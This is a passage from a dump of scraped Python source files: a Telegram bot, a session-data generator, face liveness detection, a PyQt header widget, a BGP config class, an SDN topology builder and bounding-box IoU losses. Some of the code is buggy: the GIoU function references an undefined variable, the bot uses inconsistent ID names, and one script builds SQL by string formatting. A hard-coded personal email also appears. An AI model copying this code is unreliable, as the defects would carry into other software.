new_file, allow_unicode=True)\n else:\n msg = bot.send_message(message.chat.id, '没有找到该关键词')\n time.sleep(5)\n bot.delete_message(msg.chat.id, msg.message_id)\n\n\n# 信息json处理\n@bot.message_handler(commands=['dump'])\ndef dump_msg(message):\n text = json.dumps(message.json, sort_keys=True, indent=4, ensure_ascii=False)\n new_msg = bot.send_message(message.chat.id, text)\n time.sleep(60)\n bot.delete_message(new_msg.chat.id, new_msg.message_id)\n\n\n@bot.message_handler(commands=['post'])\ndef post_message(message):\n if message.chat.type == 'supergroup':\n if message.from_user.id == 'YOUR_TG_ID':\n if message.reply_to_message:\n msg = bot.send_message(message.chat.id, '正在发送投稿')\n bot.forward_message('YOUR_CHANNEL_ID', message.chat.id, message.reply_to_message.message_id)\n bot.edit_message_text('投稿成功', msg.chat.id, msg.message_id)\n time.sleep(30)\n bot.delete_message(msg.chat.id, msg.message_id)\n else:\n bot.send_message(message.chat.id, '请回复一个消息来投稿')\n else:\n bot.send_message(message.chat.id, '只有管理员可以用!再乱动我扁你')\n else:\n bot.send_message(message.chat.id, '请在群组里使用')\n\n\n# +--------------------------------------------------------------------------------------------+\n# 查询关键词是否在字典,查询字典key对应值是否为列表,是则返回随机语句,否则直接返回key对应语句\n# 语法糖中的lambda从导入的regexp模块中查询关键词存在与否,存在返回True,不存在返回False\n# +--------------------------------------------------------------------------------------------+\nre_mg = regexp_search.Msg()\n\n\n@bot.message_handler(func=lambda message: re_mg.msg_match(message.text))\ndef reply_msg(message):\n msg_dic = re_mg.reply_msg_dic\n keyword = re_mg.keyword\n # 通过上面的keyword键从字典中读取值 \n reply_words = msg_dic[keyword] \n if type(reply_words) == list:\n num = random.randrange(len(reply_words))\n bot.send_chat_action(message.chat.id, 'typing')\n new_msg = bot.send_message(message.chat.id, reply_words[num])\n else:\n bot.send_chat_action(message.chat.id, 'typing')\n new_msg = bot.send_message(message.chat.id, reply_words)\n\n\n# 使用机器人主动私聊别的房间\n@bot.message_handler(commands=['send'])\ndef get_a_message(message):\n if message.from_user.id == MYID:\n markup = types.InlineKeyboardMarkup()\n # 首先需要在 config 文件夹里创建一个 chat_info.json 文件\n with open(\"config/chat_info.json\", 'r', encoding='utf-8') as chat_file:\n # 空文件测试\n test = chat_file.read()\n if len(test) != 0:\n chat_file.seek(0, 0)\n chat_info = json.load(chat_file)\n else:\n bot.send_message(MYID, \"chat_info is empty! Use /addchatinfo to add chat\")\n return\n\n keys = list(chat_info.keys())\n\n for key in keys:\n item = types.InlineKeyboardButton(key, callback_data=\"chat_id=%d\" % chat_info[key])\n markup.add(item)\n\n bot.send_message(MYID, \"选择一个已存聊天室,或使用 /addchatid 添加新聊天室\", reply_markup=markup)\n\n else:\n bot.send_message(message.chat.id, \"只有管理员可以使用这一功能\")\n bot.send_message(MYID, \"@%s 正在使用 send 功能\" % message.from_user.username)\n\n# 初始化变量CHATID\nCHATID = 0\n\n@bot.callback_query_handler(func=lambda call: re.match('chat_id=', call.data))\ndef attach_to_chat(call):\n global CHATID\n \n chat_id = call.data.split(\"chat_id=\")[1]\n CHATID = chat_id\n msg = bot.send_message(MYID, '已经连接到 `%s` 房间,请发送一条消息' % chat_id, parse_mode='Markdown')\n bot.register_next_step_handler(msg, send_msg_to_chat)\n\n\ndef send_msg_to_chat(message):\n msg = message.text\n bot.send_message(CHATID, msg)\n bot.send_message(MY_ID, '发送成功')\n\n\n# 添加新的聊天室(需要bot在群里面,或是已经启用过的私聊)\n@bot.message_handler(commands=[\"addchatid\"])\ndef add_chat(message):\n if message.chat.id != MYID:\n bot.send_message(message.chat.id, \"不要乱动指令\")\n return\n \n # 测试命令后是否带着chat id\n if len(message.text) == 10:\n bot.send_message(message.chat.id, \"请在指令后带上聊天室的 ChatID\")\n \n else:\n # 先测试是否能发送消息再存\n chat_id = message.text.split(\"/addchatid \")[1]\n msg = bot.send_message(message.chat.id, \"尝试发送消息\")\n\n try:\n chat_info = bot.send_message(chat_id, \"Testing message\")\n except telebot.apihelper.ApiException:\n bot.send_message(message.chat.id, \"无法发送信息,检查一下是否是存在的群\")\n else:\n msg = bot.edit_message_text(\"尝试成功,正在写入\", msg.chat.id, msg.message_id)\n\n with open(\"config/chat_info.json\", \"r+\", encoding=\"utf-8\") as chat_info_file:\n test_null = chat_info_file.read()\n \n # 信息初始化\n items = {\n \"title\": chat_info.chat.title,\n \"username\": chat_info.chat.username,\n \"first_name\": chat_info.chat.username,\n \"last_name\": chat_info.chat.last_name\n }\n for item in items.values():\n if item != None:\n name = item\n\n # 检查是否为空文件\n if len(test_null) != 0:\n chat_info_file.seek(0, 0)\n chat_dict = json.load(chat_info_file)\n chat_dict[name] = chat_id\n else:\n chat_dict = {name: chat_id}\n\n with open(\"config/chat_info.json\", \"r+\", encoding=\"utf-8\") as chat_info_file:\n json.dump(chat_dict, chat_info_file, ensure_ascii=False)\n bot.edit_message_text(\"存储成功\", msg.chat.id, msg.message_id)\n\n\nif __name__ == '__main__':\n # 轮询\n bot.polling(none_stop=True)\n","sub_path":"Bot1.py","file_name":"Bot1.py","file_ext":"py","file_size_in_byte":10305,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"263089466","text":"from app.common.database import Db\nfrom app.common.util import Util\nfrom app.models.sessions import SessionModel\nimport time\nfrom datetime import datetime\nimport random\n\nuser_id = \"jainik_vora@live.in\"\nactivities = [1, 2]\nsession_name = ['Lose Weight', 'Burn Fat!', 'Get Fit']\nstart_time = ['07:00:00', '06:30:00', '19:00:00', '17:39:00']\nend_time = ['07:35:00', '07:15:00', '19:40:00', '18:00:00']\nstatus = 'USER_CREATED'\n\ndate_range = Util.daterange(Util.convert_string_to_datetime(\"2016-08-10\"), Util.convert_string_to_datetime(\"2016-08-30\"))\n\n\nquery_single_insert = \"\"\"INSERT INTO t_user_session (\n user_id,\n name,\n workout_type_id,\n start_datetime,\n end_datetime,\n session_status,\n created_datetime,\n modified_datetime,\n\t\t session_type\n ) VALUES (\n '%(user_id)s',\n '%(name)s',\n %(workout_type_id)s,\n '%(start_datetime)s',\n '%(end_datetime)s',\n '%(session_status)s',\n '%(created_datetime)s',\n '%(modified_datetime)s',\n\t\t 'PERSONAL'\n )\"\"\"\n\nuser_sessions = []\nfor date in date_range:\n this_session_name = session_name[random.randint(0, 2)]\n random_num = random.randint(0, 3)\n session_start_date = date.strftime(\"%Y-%m-%d\") + \" \" + start_time[random_num]\n session_end_date = date.strftime(\"%Y-%m-%d\") + \" \" + end_time[random_num]\n workout_type = activities[random.getrandbits(1)]\n\n data = {\n 'user_id': user_id,\n 'name': this_session_name,\n 'workout_type_id': workout_type,\n 'start_datetime': session_start_date,\n 'end_datetime': session_end_date,\n 'session_status': status,\n 'created_datetime': Util.get_current_time(),\n 'modified_datetime': Util.get_current_time()\n }\n Db.execute_insert_query(query_single_insert % data)\n","sub_path":"app/scripts/generate_session_data.py","file_name":"generate_session_data.py","file_ext":"py","file_size_in_byte":2052,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"191269790","text":"import face_recognition\nfrom keras.preprocessing.image import img_to_array\nfrom keras.models import load_model\nimport numpy as np\nimport pickle\nimport cv2\nimport os\nimport Svm_face_recognition\n\nclass FaceRecognition():\n def __init__(self):\n self.process_this_frame = True\n self.label = \"fake\"\n # 加载人脸检测模型和活体模型\n self.protoPath = os.path.sep.join([\"face_detector\", \"deploy.prototxt\"]) # 路径组合\n self.modelPath = os.path.sep.join([\"face_detector\",\"res10_300x300_ssd_iter_140000.caffemodel\"])\n self.net = cv2.dnn.readNetFromCaffe(self.protoPath, self.modelPath) # 用于进行SSD网络的caffe框架的加载,(进行目标检测的网络)\n self.model = load_model(\"./model/liveness.model\") # liveness.model : keras 训练好的模型\n self.le = pickle.loads(open(\"./model/le.pickle\", \"rb\").read()) # le.pickle : 类别标签编码器\n\n\n def kernel(self, frame, known_face,num_list):\n self.label = \"fake\"\n # 改变摄像头图像的大小,图像小,所做的计算就少\n # grab the frame dimensions and convert it to a blob\n (h, w) = frame.shape[:2]\n blob = cv2.dnn.blobFromImage(cv2.resize(frame, (300, 300)), 1.0,(300, 300), (104.0, 177.0, 123.0)) # 对图像进行归一化操作(-1, 1)\n # pass the blob through the network and obtain the detections and\n # predictions\n self.net.setInput(blob) # 表示将图片输入到caffe网络中\n detections = self.net.forward() # 输出前向传播的预测结果\n\n # 对探测结果进行循环\n for i in range(0, detections.shape[2]):\n # extract the confidence (i.e., probability) associated with the\n # prediction\n confidence = detections[0, 0, i, 2]\n\n # filter out weak detections 过滤掉微弱的检测信号\n if confidence > 0.8:\n # compute the (x, y)-coordinates of the bounding box for\n # the face and extract the face ROI\n # 计算出人脸的坐标范围\n box = detections[0, 0, i, 3:7] * np.array([w, h, w, h])\n (startX, startY, endX, endY) = face_box = box.astype(\"int\")\n startX = max(0, startX)\n startY = max(0, startY)\n endX = min(w, endX)\n endY = min(h, endY)\n if startX > 1200 or startY > 1200 or endX > 1200 or endY > 1200:\n break\n face = frame[startY:endY, startX:endX]\n face = cv2.resize(face, (32, 32))\n face = face.astype(\"float\") / 255.0\n face = img_to_array(face) # 将人脸矩阵中的整数,换成浮点数\n face = np.expand_dims(face, axis=0) # 在 0 轴上,添加一个维度\n preds = self.model.predict(face)[0]\n j = np.argmax(preds) # 取出 preds 中最大的数的索引\n if preds[j] > 0.2:\n self.label = self.le.classes_[j]\n\n\n small_frame = cv2.resize(frame, (0, 0), fx=0.25, fy=0.25)\n # opencv的图像是BGR格式的,而我们需要的是RGB格式,因 此要进行一个转换\n rgb_small_frame = small_frame[:, :, ::-1]\n\n if self.process_this_frame:\n # 根据encoding来判断是不是同一个人,是就输出true,不是为false\n if str(self.label) == \"real\":\n num = Svm_face_recognition.recognition(rgb_small_frame)\n return num\n\n\n\n\nif __name__ == \"__main__\":\n pass\n\n\n\n","sub_path":"人脸识别/登记系统的制作/Face_Recognition.py","file_name":"Face_Recognition.py","file_ext":"py","file_size_in_byte":3614,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"443225946","text":"\n\n##################################################################################\n## Imports\n\n# GUI\nfrom PyQt5.QtWidgets import QHeaderView, QStyleOptionHeader, QStyle\nfrom PyQt5.QtCore import Qt, QRect\nfrom PyQt5.QtGui import QCursor\n\n\n####################################################################################\n## Class to enable latex headers\nclass wTexHeader(QHeaderView):\n def __init__(self, parent, ori=Qt.Horizontal):\n super().__init__(ori, parent)\n\n self.setSectionsClickable(True)\n #self.setStretchLastSection(True)\n\n # creating list of qpixmaps\n self.qpixmaps = []\n return\n\n def paintSection(self, painter, rect, logicalIndex):\n # skipping uneccesarry\n if not rect.isValid():\n return\n\n # checking if there are no pixmaps\n # using default painter\n if not self.qpixmaps:\n super().paintSection(painter, rect, logicalIndex)\n return\n #------------------------------ paint section (without the label) ----\n opt = QStyleOptionHeader()\n self.initStyleOption(opt)\n\n opt.rect = rect\n opt.section = logicalIndex\n opt.text = \"\"\n\n #---- mouse over highlight ----\n mouse_pos = self.mapFromGlobal(QCursor.pos())\n if rect.contains(mouse_pos):\n opt.state |= QStyle.State_MouseOver\n\n #---- paint ----\n painter.save()\n self.style().drawControl(QStyle.CE_Header, opt, painter, self)\n painter.restore()\n\n #------------------------------------------- paint mathText label ----\n # aliasing qpixmap\n qpixmap = self.qpixmaps[logicalIndex]\n\n #---- centering ----\n xpix = (rect.width() - qpixmap.size().width()) / 2. + rect.x()\n ypix = (rect.height() - qpixmap.size().height()) / 2.\n\n\n #---- paint ----\n rect = QRect(xpix, ypix, qpixmap.size().width(), qpixmap.size().height())\n painter.drawPixmap(rect, qpixmap)\n\n return\n\n def sizeHint(self):\n\n baseSize = QHeaderView.sizeHint(self)\n\n baseHeight = baseSize.height()\n if len(self.qpixmaps):\n for pixmap in self.qpixmaps:\n baseHeight = max(pixmap.height() + 8, baseHeight)\n baseSize.setHeight(baseHeight)\n\n self.parentWidget().repaint()\n\n return baseSize\n","sub_path":"wynTable/wynTexHeader.py","file_name":"wynTexHeader.py","file_ext":"py","file_size_in_byte":2357,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"641419482","text":"from a10sdk.common.A10BaseClass import A10BaseClass\n\n\nclass IpCidr(A10BaseClass):\n \n \"\"\"Class Description::\n Specify a ip network to announce via BGP.\n\n Class ip-cidr supports CRUD Operations and inherits from `common/A10BaseClass`.\n This class is the `\"PARENT\"` class for this module.`\n\n :param description: {\"description\": \"Network specific description (Up to 80 characters describing this network)\", \"format\": \"string-rlx\", \"minLength\": 1, \"optional\": true, \"maxLength\": 80, \"type\": \"string\"}\n :param route_map: {\"description\": \"Route-map to modify the attributes (Name of the route map)\", \"format\": \"string\", \"minLength\": 1, \"optional\": true, \"maxLength\": 128, \"type\": \"string\"}\n :param comm_value: {\"optional\": true, \"type\": \"string\", \"description\": \"community value in the format 1-4294967295|AA:NN|internet|local-AS|no-advertise|no-export\", \"format\": \"string-rlx\"}\n :param backdoor: {\"default\": 0, \"optional\": true, \"type\": \"number\", \"description\": \"Specify a BGP backdoor route\", \"format\": \"flag\"}\n :param network_ipv4_cidr: {\"optional\": false, \"type\": \"string\", \"description\": \"Specify network mask\", \"format\": \"ipv4-cidr\"}\n :param uuid: {\"description\": \"uuid of the object\", \"format\": \"string\", \"minLength\": 1, \"modify-not-allowed\": 1, \"optional\": true, \"maxLength\": 64, \"type\": \"string\"}\n :param DeviceProxy: The device proxy for REST operations and session handling. Refer to `common/device_proxy.py`\n\n \n\n URL for this object::\n `https:////axapi/v3/router/bgp/{as_number}/network/ip-cidr/{network_ipv4_cidr}`.\n\n \n\n \n \"\"\"\n def __init__(self, **kwargs):\n self.ERROR_MSG = \"\"\n self.required = [ \"network_ipv4_cidr\"]\n\n self.b_key = \"ip-cidr\"\n self.a10_url=\"/axapi/v3/router/bgp/{as_number}/network/ip-cidr/{network_ipv4_cidr}\"\n self.DeviceProxy = \"\"\n self.description = \"\"\n self.route_map = \"\"\n self.comm_value = \"\"\n self.backdoor = \"\"\n self.network_ipv4_cidr = \"\"\n self.uuid = \"\"\n\n for keys, value in kwargs.items():\n setattr(self,keys, value)\n\n\n","sub_path":"a10sdk/core/router/router_bgp_network_ip_cidr.py","file_name":"router_bgp_network_ip_cidr.py","file_ext":"py","file_size_in_byte":2128,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"497238205","text":"import numpy as np\n\ndef rdfixwid(file,colist,typelist,empstr=None,skiprows=0):\n \"\"\"\n Read fixedwidth data and spit out arrays\n \"\"\"\n outlist =[]\n f = open(file,'r')\n txt = f.readlines()\n txt = txt[skiprows:]\n nrows = len(txt)\n ncol = len(colist)\n\n for type in typelist:\n outlist.append(np.zeros(nrows,dtype=type))\n \n \n for i in range(nrows):\n for j in range(ncol):\n word = txt[i][colist[j][0]:colist[j][1]]\n if empstr is not None:\n word = emp2none(word,empstr)\n outlist[j][i] = word\n\n return tuple(outlist)\n\n\n\ndef emp2none(inpstr,empstr):\n \"\"\"\n If inpstr corresponds to an empty string. Return a none. \n \"\"\"\n if inpstr.strip() is empstr:\n inpstr = None\n\n return inpstr\n","sub_path":"rdfixwid.py","file_name":"rdfixwid.py","file_ext":"py","file_size_in_byte":804,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"314599339","text":"import glob\nimport os\nimport argparse as argp\nimport numpy as np\nimport meshio\nimport matplotlib.pyplot as plt\nimport matplotlib.ticker as mtick\nimport scipy.stats\n\nNUM_ELE = [80, 180, 320, 500, 720]\nFOLDER_NAMES = [\"cp-le\", \"cp-qe\", \"lp-le\", \"lp-qe\"]\n\ndef main():\n parser = argp.ArgumentParser(description=\"Creates 2x2 plot of average local error data for the 4 parameterizations\")\n parser.add_argument(\"in_dir\", help=\"Starting folder of vtk files. Expecting specific folder structure in subfolders\")\n parser.add_argument(\n \"-o\",\n \"--outname\",\n help=\"output file name\",\n default=\"avg_rel_errs\"\n )\n parser.add_argument(\n \"-t\",\n \"--tag\",\n help=\"Ellipsoid dimensions tag to put on figure\",\n required=True\n )\n args = parser.parse_args()\n\n fig, axs = plt.subplots(2, 2, sharey=True, figsize=(6, 6))\n axs = np.ravel(axs)\n axs[0].set_ylim([0.001, 0.40])\n\n for i, fn in enumerate(FOLDER_NAMES):\n subfolder = os.path.join(os.path.join(args.in_dir, fn), \"\")\n E12_errs = []\n E23_errs = []\n E31_errs = []\n Ep_errs = []\n Em_errs = []\n H3x3_0_errs = []\n H3x3_1_errs = []\n H3x3_2_errs = []\n for vtk_file in sorted(glob.glob(subfolder + \"*.vtk\")):\n io_mesh = meshio.read(vtk_file)\n if io_mesh.cell_data:\n data = io_mesh.cell_data\n elif io_mesh.point_data:\n data = io_mesh.point_data\n E12_errs.append(np.mean(data[\"local_err_E12\"]))\n E23_errs.append(np.mean(data[\"local_err_E23\"]))\n E31_errs.append(np.mean(data[\"local_err_E31\"]))\n Ep_errs.append(np.mean(data[\"local_err_Ep\"]))\n Em_errs.append(np.mean(data[\"local_err_Em\"]))\n H3x3_0_errs.append(np.mean(data[\"local_err_3x3_0\"]))\n H3x3_1_errs.append(np.mean(data[\"local_err_3x3_1\"]))\n H3x3_2_errs.append(np.mean(data[\"local_err_3x3_2\"]))\n\n axs[i].plot(NUM_ELE, E12_errs, label=r\"$E^{(12)}$\", marker=\"o\", markersize=3)\n axs[i].plot(NUM_ELE, E23_errs, label=r\"$E^{(23)}$\", marker=\"^\", markersize=3)\n axs[i].plot(NUM_ELE, E31_errs, label=r\"$E^{(31)}$\", marker=\"s\", markersize=3)\n axs[i].plot(NUM_ELE, Ep_errs, label=r\"$E^{(+)}$\", marker=\"p\", markersize=3)\n axs[i].plot(NUM_ELE, Em_errs, label=r\"$E^{(-)}$\", marker=\"H\", markersize=3)\n\n axs[i].plot(NUM_ELE, H3x3_0_errs, label=r\"$Q^{(1)}$\", marker=\"*\", markersize=3)\n axs[i].plot(NUM_ELE, H3x3_1_errs, label=r\"$Q^{(2)}$\", marker=\"d\", markersize=3)\n axs[i].plot(NUM_ELE, H3x3_2_errs, label=r\"$Q^{(3)}$\", marker=\"x\", markersize=3)\n\n axs[i].set_xscale(\"log\")\n axs[i].set_xlim([60, 1000])\n axs[i].set_yscale(\"log\")\n\n if i in [2, 3]:\n axs[i].set_xlabel(\"Number of elements\")\n if i in [0, 2]:\n axs[i].set_ylabel(\"Average local error\")\n\n add_textbox(axs[i], fn)\n\n # Set common labels\n props = dict(boxstyle='round', facecolor='skyblue', alpha=0.5)\n ellipsoid_tag = args.tag + \"\\n ellipsoid\"\n handles, labels = axs[0].get_legend_handles_labels()\n fig.legend(handles, labels, loc=\"center\", bbox_to_anchor=(0.92, 0.5))\n fig.text(0.92, 0.75, ellipsoid_tag,\n horizontalalignment=\"center\",\n verticalalignment=\"center\",\n bbox=props\n )\n\n fig.tight_layout(rect=[0, 0, 0.85, 1])\n fig.savefig(\"{}.pdf\".format(args.outname), format=\"pdf\")\n\n\ndef add_textbox(ax, textstr):\n \"\"\"\n Adds an informative textbox to to figure\n\n Parameters:\n ax: the axes object\n textstr: the string in the textbox\n Returns:\n None\n \"\"\"\n props = dict(boxstyle='round', facecolor='wheat', alpha=0.5)\n ax.text(0.80, 0.90, textstr,\n horizontalalignment=\"center\",\n verticalalignment=\"center\",\n transform=ax.transAxes,\n fontsize=10,\n bbox=props\n )\n\n\ndef c2l(x):\n if isinstance(x, list):\n return x[0]\n return x\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"graph_making/old/make_2x2_avg_err.py","file_name":"make_2x2_avg_err.py","file_ext":"py","file_size_in_byte":4075,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"628198651","text":"from collections import defaultdict\nfrom pox.core import core\nfrom pox.lib.revent import EventHalt,Event,EventMixin\nfrom sre_constants import MIN_UNTIL\n\n# Graph class, contains the discovered network topology in nodes, edges format. Between the links there is an opportunity\n# to compute with different distance values, therefore we have a dictionary to store these values (distances dict). We also store\n# the ports which belong to exact links, in order to be able to insert the correct output ports on the selected route to the routers' flow table.\n\nlog = core.getLogger()\n\nclass GraphStructureChanged(Event):\n def __str__ (self):\n return \"Graph Structure changed\"\n \n def __init__ (self,graph_builder):\n super(GraphStructureChanged,self).__init__()\n self.graph_builder = graph_builder\n \n def get_graph_builder(self):\n return self.graph_builder\n \n \nclass GraphBuilder(EventMixin):\n _eventMixin_events = set([GraphStructureChanged])\n _rule_priority_adjustment = -0x1000 \n\n def __init__(self):\n core.addListeners(self)\n core.openflow_discovery.addListeners(self)\n self.nodes = []\n self.edges = defaultdict(list)\n self.distances = {}\n self.ports = {}\n \n def add_node(self, value):\n if value not in self.nodes:\n self.nodes.append(value)\n \n def del_node(self, value):\n if value not in self.edges.values() and value in self.nodes:\n self.nodes.remove(value)\n \n def add_edge(self, from_node, from_port, to_node, to_port, distance):\n self.edges[from_node].append(to_node)\n self.distances[(from_node, to_node)] = distance\n self.ports[(from_node,to_node)] = (from_port,to_port)\n \n def del_edge(self,from_node, from_port, to_node, to_port):\n if from_node in self.edges.keys():\n to_delete_index = self.edges[from_node].index(to_node)\n del self.edges[from_node][to_delete_index]\n \n if len(self.edges[from_node]) == 0:\n self.edges.pop(from_node)\n \n if (from_node, to_node) in self.distances.keys():\n self.distances.pop((from_node, to_node))\n \n if (from_node,to_node) in self.ports.keys():\n self.ports.pop((from_node,to_node))\n \n was_there = False\n for item in self.edges.values():\n if to_node in item:\n was_there = True\n if was_there == False:\n self.del_node(to_node)\n \n def _handle_LinkEvent(self, event):\n\n if (event.added == True ):\n log.info(\"ConnectionUp, dpid1=%s\" % (event.link.dpid1))\n log.info(\"ConnectionUp, dpid2=%s\" % (event.link.dpid2))\n self.add_node(event.link.dpid1)\n self.add_node(event.link.dpid2)\n self.add_edge(event.link.dpid1, event.link.port1, event.link.dpid2, event.link.port2, 1)\n else:\n log.info(\"ConnectionDown, dpid1=%s\" % (event.link.dpid1))\n log.info(\"ConnectionDown, dpid2=%s\" % (event.link.dpid2))\n self.del_edge(event.link.dpid1, event.link.port1, event.link.dpid2, event.link.port2)\n \n ev = GraphStructureChanged(self)\n self.raiseEvent(ev)\n return EventHalt\n \n def get_graph_structures(self):\n return self.nodes,self.edges,self.distances,self.ports\n \n def get_ports(self):\n return self.ports\n \n def minimal_cost_spanning_tree(self,group_members,root):\n visited = set()\n visited_group_members = set()\n min_tree = []\n \n result_min_tree = []\n \n nodes = set(self.nodes)\n group_members = set(group_members.keys())\n visited.add(root)\n \n before_edges = {}\n \n while visited_group_members != group_members or visited == nodes:\n not_visited = set()\n not_visited = nodes.difference(visited)\n \n min_edge = 0\n for visited_node in visited:\n for not_visited_node in not_visited:\n temp_edge = (visited_node,not_visited_node)\n if (temp_edge in self.distances.keys()):\n if min_edge == 0:\n min_edge = temp_edge\n elif self.distances[temp_edge] < self.distances[min_edge]:\n min_edge = (visited_node,not_visited_node)\n \n if not before_edges.has_key(min_edge[1]):\n before_edge = min_edge\n before_edges.update({min_edge[1]:before_edge}) \n \n if min_edge not in min_tree:\n min_tree.append(min_edge)\n \n visited.add(min_edge[1])\n if min_edge[1] in group_members:\n visited_group_members.add(min_edge[1])\n log.info(\"The min tree: \"+str(min_tree))\n log.info(\"The before edge dict: \"+str(before_edges))\n \n for member in group_members:\n temp_edge = ()\n for edge in min_tree:\n if edge[1] == member:\n temp_edge = edge\n break\n \n result_min_tree.append(temp_edge)\n while temp_edge[0] != root:\n temp_edge = before_edges[temp_edge[0]]\n if temp_edge not in result_min_tree:\n result_min_tree.append(temp_edge)\n \n return result_min_tree\n\ndef launch():\n graph_builder = GraphBuilder()\n core.register(\"GraphBuilder\",graph_builder)\n ","sub_path":"graph_builder.py","file_name":"graph_builder.py","file_ext":"py","file_size_in_byte":5630,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"505543683","text":"import torch\nfrom torch import nn\nimport math\nimport torch.nn.functional as F\nimport torch.cuda.amp as amp\n\nclass IOULoss(nn.Module):\n def __init__(self, loc_loss_type):\n super(IOULoss, self).__init__()\n self.loc_loss_type = loc_loss_type\n\n def forward(self, pred, target, weight=None):\n pred_left = pred[:, 0]\n pred_top = pred[:, 1]\n pred_right = pred[:, 2]\n pred_bottom = pred[:, 3]\n\n target_left = target[:, 0]\n target_top = target[:, 1]\n target_right = target[:, 2]\n target_bottom = target[:, 3]\n\n pred_area = (pred_left + pred_right) * (pred_top + pred_bottom)\n target_area = (target_left + target_right) * (target_top + target_bottom)\n\n w_intersect = torch.min(pred_left, target_left) + torch.min(pred_right, target_right)\n g_w_intersect = torch.max(pred_left, target_left) + torch.max(pred_right, target_right)\n h_intersect = torch.min(pred_bottom, target_bottom) + torch.min(pred_top, target_top)\n g_h_intersect = torch.max(pred_bottom, target_bottom) + torch.max(pred_top, target_top)\n ac_uion = g_w_intersect * g_h_intersect + 1e-7\n area_intersect = w_intersect * h_intersect\n area_union = target_area + pred_area - area_intersect\n ious = (area_intersect + 1.0) / (area_union + 1.0)\n gious = ious - (ac_uion - area_union) / ac_uion\n\n if self.loc_loss_type == 'iou':\n losses = -torch.log(ious)\n elif self.loc_loss_type == 'linear_iou':\n losses = 1 - ious\n elif self.loc_loss_type == 'giou':\n losses = 1 - gious\n else:\n raise NotImplementedError\n\n if weight is not None and weight.sum() > 0:\n return (losses * weight).sum() / weight.sum()\n else:\n assert losses.numel() != 0\n return losses.mean()\n # if losses.numel() == 0:\n # print('aa')\n\nlinear_iou = IOULoss(loc_loss_type='linear_iou')\nlinear_giou = IOULoss(loc_loss_type='giou')\n\n## GIOU loss is proposed here: https://arxiv.org/abs/1902.09630\nclass GIOULoss(nn.Module):\n\n def __init__(self, eps=1e-5, reduction='mean'):\n super(GIOULoss, self).__init__()\n self.eps = eps\n self.reduction = reduction\n\n def forward(self, pr_bboxes, gt_bboxes):\n \"\"\"\n pr_bboxes: tensor (-1, 4) xyxy, predicted bbox\n gt_bboxes: tensor (-1, 4) xyxy, ground truth bbox\n loss proposed in the paper of giou\n \"\"\"\n giou = giou_func(gt_bboxes, pr_bboxes, self.eps)\n loss = 1. - giou\n if self.reduction == 'mean':\n loss = loss.mean()\n elif self.reduction == 'sum':\n loss = loss.sum()\n elif self.reduction == 'none':\n pass\n return loss\n\n\n## DIOU loss is proposed here: https://arxiv.org/abs/1911.08287\nclass DIOULoss(nn.Module):\n\n def __init__(self, eps=1e-5, reduction='mean'):\n super(DIOULoss, self).__init__()\n self.eps = eps\n self.reduction = reduction\n\n def forward(self, pr_bboxes, gt_bboxes, weight=None):\n \"\"\"\n pr_bboxes: tensor (-1, 4) xyxy, predicted bbox\n gt_bboxes: tensor (-1, 4) xyxy, ground truth bbox\n loss proposed in the paper of giou\n \"\"\"\n diou = diou_func(gt_bboxes, pr_bboxes, self.eps)\n loss = 1. - diou\n if self.reduction == 'mean':\n loss = loss.mean()\n elif self.reduction == 'sum':\n loss = loss.sum()\n elif self.reduction == 'none':\n pass\n\n if weight is not None and weight.sum() > 0:\n return (loss * weight).sum() / weight.sum()\n else:\n assert loss.numel() != 0\n return loss.mean()\n\n\n\n\n## CIOU loss is also proposed here: https://arxiv.org/abs/1911.08287\nclass CIOULoss(nn.Module):\n\n def __init__(self, eps=1e-5, reduction='sum'):\n super(CIOULoss, self).__init__()\n self.eps = eps\n self.reduction = reduction\n\n def forward(self, pr_bboxes, gt_bboxes):\n \"\"\"\n pr_bboxes: tensor (-1, 4) xyxy, predicted bbox\n gt_bboxes: tensor (-1, 4) xyxy, ground truth bbox\n loss proposed in the paper of giou\n \"\"\"\n ciou = ciou_func(gt_bboxes, pr_bboxes, self.eps)\n loss = 1. - ciou\n if self.reduction == 'mean':\n loss = loss.mean()\n elif self.reduction == 'sum':\n loss = loss.sum()\n elif self.reduction == 'none':\n pass\n return loss\n\n\ndef iou_func(gt_bboxes, pr_bboxes, eps=1e-5):\n \"\"\"\n input:\n gt_bboxes: tensor (N, 4) xyxy\n pr_bboxes: tensor (N, 4) xyxy\n output:\n gious: tensor (N, )\n \"\"\"\n gt_area = (gt_bboxes[:, 2]-gt_bboxes[:, 0])*(gt_bboxes[:, 3]-gt_bboxes[:, 1])\n pr_area = (pr_bboxes[:, 2]-pr_bboxes[:, 0])*(pr_bboxes[:, 3]-pr_bboxes[:, 1])\n\n # iou\n lt = torch.max(gt_bboxes[:, :2], pr_bboxes[:, :2])\n rb = torch.min(gt_bboxes[:, 2:], pr_bboxes[:, 2:])\n wh = (rb - lt + eps).clamp(min=0)\n inter = wh[:, 0] * wh[:, 1]\n union = gt_area + pr_area - inter\n iou = inter / union\n return iou\n\n\ndef giou_func(gt_bboxes, pr_bboxes, eps=1e-5):\n \"\"\"\n input:\n gt_bboxes: tensor (N, 4) xyxy\n pr_bboxes: tensor (N, 4) xyxy\n output:\n gious: tensor (N, )\n \"\"\"\n iou = iou_func(gt_bboxes, pr_bboxes, eps)\n\n # enclosure\n lt = torch.min(gt_bboxes[:, :2], pr_bboxes[:, :2])\n rb = torch.max(gt_bboxes[:, 2:], pr_bboxes[:, 2:])\n wh = (rb - lt + eps).clamp(min=0)\n enclosure = wh[:, 0] * wh[:, 1]\n\n giou = iou - (enclosure - union) / enclosure\n return giou\n\n\n\ndef diou_func(gt_bboxes, pr_bboxes, eps=1e-5):\n \"\"\"\n input:\n gt_bboxes: tensor (N, 4) xyxy\n pr_bboxes: tensor (N, 4) xyxy\n output:\n dious: tensor (N, )\n \"\"\"\n iou = iou_func(gt_bboxes, pr_bboxes, 